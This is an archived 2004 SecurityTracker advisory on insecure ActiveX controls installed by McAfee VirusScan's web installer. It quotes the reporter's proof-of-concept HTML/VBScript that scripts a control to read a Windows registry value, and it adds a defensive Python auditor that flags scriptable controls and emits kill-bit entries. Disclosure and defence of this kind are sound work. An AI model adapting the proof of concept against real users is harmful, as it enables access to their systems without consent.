SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |
SecurityTracker Archives

Category:  Application (Security)  >  VirusScan
Vendors:  McAfee
McAfee VirusScan ActiveX Controls Let Remote Users Access the Target User's System
SecurityTracker Alert ID:  1009956
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Apr 27 2004
Impact:  User access via network
Exploit Included:  Yes  
Description:  A vulnerability was reported in McAfee VirusScan. A remote user may be able to access a target user's system.

Jonathan Payne reported that the software's web-based installer appears to install several ActiveX controls that are not secured against use by arbitrary web content. A remote user can create HTML that, when loaded by the target user in Internet Explorer, will instantiate these controls and script them to access the target user's system. Because the demonstration works in Internet Explorer 6 at its default security settings, which only allow a web page to script controls that are registered as safe for scripting, the controls must be registered that way. The reported controls include ones for accessing the registry and the file system and for configuring the operating system.

A demonstration exploit that accesses the target user's Windows registry is provided in the Source Message.

Impact:  A remote user can create HTML that, when loaded by the target user, will be able to access the target user's system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.mcafee.com/
Cause:  Access control error
Underlying OS:  Windows (Any)
Reported By:  Jonathan Payne <jpayne@DSL.PIPEX.COM>
Message History:   None.


 Source Message Contents

Date:  Sun, 25 Apr 2004 08:17:25 +0100
From:  Jonathan Payne <jpayne@DSL.PIPEX.COM>
Subject:  McAfee VirusScan installer uses insecure ActiveX controls

 

After installing the McAfee VirusScan, it appears that it is possible for
any web page to access the Windows registry with the following HTML:

<html>
 <!-- Instantiates the installer's registry control by CLSID; it is hidden,
      so nothing is shown until the script below writes the query result -->
 <object classid="clsid:4C29D864-C55A-46DD-865C-17A1B7CC1A1A" id="gobjReg"
style="display: none;">
 </object>
 <h1>McAfee installer test</h1>
 <script language="vbscript">
  ' Reads a registry value under HKEY_CURRENT_USER through the control
  ' and writes it into the page
  document.write( _
   gobjReg.RegQueryValue( "HKCU\Control Panel\Desktop", "Wallpaper") _
  )
 </script>
</html>

(when viewed in IE 6 with default security and with VirusScan installed,
this HTML displays the location of the current Windows desktop bitmap)

You can see this behaviour by selecting the 15-Day Free trial of McAfee
Virus scan from this page:
   http://download.mcafee.com/us/eval/evaluate2.asp?cid=9445
Then going through the account creation process and then clicking on the
download link.

The download page (the one with the "Start" button) appears to install a
number of ActiveX controls which are not secured in any way.  As well as the
registry one, there are controls for accessing the file system and for
configuring the operating system.

I have uploaded a full copy of the IDL for the installer objects here:
   http://www.aslg21.dsl.pipex.com/test/McAfeeIDL.txt
There appear to be lots more fun interfaces that I haven't tested yet.

Jonathan Payne


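The alert lists no vendor fix, and the demonstration above runs under IE 6's default settings, which means the control is registered as safe for scripting and carries no kill bit. The script below is an added example, not part of the SecurityTracker alert or of McAfee's software: it parses a Windows registry export (.reg), reports which registered ActiveX controls an untrusted web page could instantiate and script (marked safe for scripting under "Implemented Categories" and not kill-bitted under "ActiveX Compatibility"), and emits the kill-bit entry an administrator can import to block one. The registry contents embedded in it are constructed for illustration; only the CLSID 4C29D864-C55A-46DD-865C-17A1B7CC1A1A comes from the page, and how the real installer registers that control is an assumption.

```python
"""Audit a Windows registry export (.reg) for ActiveX controls that an
untrusted web page can script in Internet Explorer, and emit the kill-bit
entry that blocks one. Added example; the sample export is constructed."""
import re
from dataclasses import dataclass

# Component categories IE checks before scripting a control from a page.
CATID_SAFE_FOR_SCRIPTING = "{7DD95801-9882-11CF-9FA9-00AA006C42C4}"
CATID_SAFE_FOR_INIT = "{7DD95802-9882-11CF-9FA9-00AA006C42C4}"
# Bit in "Compatibility Flags" that makes IE refuse to load the control.
KILL_BIT = 0x400
COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
# CLSID used by the advisory's demonstration page.
MCAFEE_REG_CLSID = "{4C29D864-C55A-46DD-865C-17A1B7CC1A1A}"

# Constructed export: the advisory's CLSID marked safe (assumed registration),
# one control already kill-bitted, and one control with no safety marking.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{4C29D864-C55A-46DD-865C-17A1B7CC1A1A}]
@="Registry helper (constructed)"

[HKEY_CLASSES_ROOT\CLSID\{4C29D864-C55A-46DD-865C-17A1B7CC1A1A}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_CLASSES_ROOT\CLSID\{4C29D864-C55A-46DD-865C-17A1B7CC1A1A}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_CLASSES_ROOT\CLSID\{11111111-1111-1111-1111-111111111111}]
@="Blocked control (constructed)"

[HKEY_CLASSES_ROOT\CLSID\{11111111-1111-1111-1111-111111111111}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{11111111-1111-1111-1111-111111111111}]
"Compatibility Flags"=dword:00000400

[HKEY_CLASSES_ROOT\CLSID\{22222222-2222-2222-2222-222222222222}]
@="Unmarked control (constructed)"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^(?:@|"([^"]*)")=(.*)$')
CLSID_RE = re.compile(r"^HKEY_CLASSES_ROOT\\CLSID\\(\{[0-9A-F-]{36}\})$")


def parse_reg(text):
    """Map each key path to its values. Paths and value names are upper-cased
    because the registry compares them case-insensitively."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if m := KEY_RE.match(line):
            current = m.group(1).upper()
            keys.setdefault(current, {})
        elif (m := VALUE_RE.match(line)) and current is not None:
            keys[current][(m.group(1) or "@").upper()] = m.group(2)
    return keys


def dword(value):
    """Decode a .reg 'dword:XXXXXXXX' value; anything else counts as 0."""
    return int(value[6:], 16) if value.lower().startswith("dword:") else 0


@dataclass
class ControlStatus:
    clsid: str
    safe_for_scripting: bool
    safe_for_init: bool
    kill_bit: bool

    @property
    def page_scriptable(self):
        # IE's default Internet-zone policy: a page may script a control only
        # if it is marked safe for scripting and has not been kill-bitted.
        return self.safe_for_scripting and not self.kill_bit


def status_of(keys, clsid):
    clsid = clsid.upper()
    cats = f"HKEY_CLASSES_ROOT\\CLSID\\{clsid}\\IMPLEMENTED CATEGORIES\\"
    compat = keys.get(f"{COMPAT_KEY.upper()}\\{clsid}", {})
    flags = dword(compat.get("COMPATIBILITY FLAGS", "dword:0"))
    return ControlStatus(clsid,
                         cats + CATID_SAFE_FOR_SCRIPTING in keys,
                         cats + CATID_SAFE_FOR_INIT in keys,
                         bool(flags & KILL_BIT))


def scriptable_controls(keys):
    """CLSIDs an untrusted page could instantiate and script, sorted."""
    found = {m.group(1) for k in keys if (m := CLSID_RE.match(k))}
    return sorted(c for c in found if status_of(keys, c).page_scriptable)


def kill_bit_reg(clsid):
    """A .reg fragment setting the kill bit: the administrator-side block
    when, as here, no vendor fix is available."""
    return (f"Windows Registry Editor Version 5.00\r\n\r\n[{COMPAT_KEY}\\{clsid.upper()}]\r\n"
            f'"Compatibility Flags"=dword:{KILL_BIT:08x}\r\n')


if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    for clsid in scriptable_controls(reg):
        print(f"{clsid} is scriptable from any web page; kill-bit entry:")
        print(kill_bit_reg(clsid))
```

On a real machine the input would be an export such as `reg export HKCR\CLSID clsid.reg` together with the "ActiveX Compatibility" key; note that a control can also claim safety at run time through IObjectSafety without the category keys, so an absent category entry is not proof that a page cannot script it, whereas a set kill bit is conclusive for Internet Explorer.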

Copyright 2004, SecurityGlobal.net LLC